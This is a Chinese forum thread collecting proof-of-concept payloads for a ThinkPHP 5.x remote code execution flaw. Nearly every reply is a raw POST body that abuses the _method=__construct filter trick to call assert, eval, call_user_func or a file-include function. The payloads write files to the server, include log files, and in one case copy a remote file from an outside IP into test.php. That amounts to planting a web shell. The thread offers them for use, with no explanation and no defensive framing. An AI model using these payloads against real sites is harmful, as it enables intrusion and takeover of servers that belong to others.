Thinkphp V5.X 远程代码执行漏洞-POC 集合

游客 2月前 123

最新回复 (7)
  • adminsb 1月前
    0 引用 2
    _method=__construct&method=get&filter[]=assert&server[]=-1&get[]=eval/*~xx*/($_POST[1]);&1=file_put_contents(urldecode('要写入的路径'),fopen('服务器上的文件','r'));
  • adminsb 1月前
    0 引用 3
    _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runtime/log/201908/01.log&x=phpinfo();
  • adminsb 1月前
    0 引用 4
    _method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/201908/01.log&jltx=file_put_contents(urldecode('要写入的路径'),fopen('服务器上的文件','r'));
  • adminsb 1月前
    0 引用 5
    _method=__construct&filter[]=think\Session::set&method=get&server[REQUEST_METHOD]=<? phpinfo();?>
  • adminsb 1月前
    0 引用 6
    _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
  • adminsb 1月前
    0 引用 7
    _method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=
    _method=__construct&method=get&filter[]=think\Session::set&server[REQUEST_METHOD]=
    _method=__construct&method=get&filter[]=think\Session::set&server[]=-1&get[]=
  • adminsb 16天前
    0 引用 8
    _method=__construct&filter[]=call_user_func&method=get&server[REQUEST_METHOD]=<?=copy("http://192.168.31.174/test.txt","test.php");?>
  • 游客f58aa
    9
返回
发新帖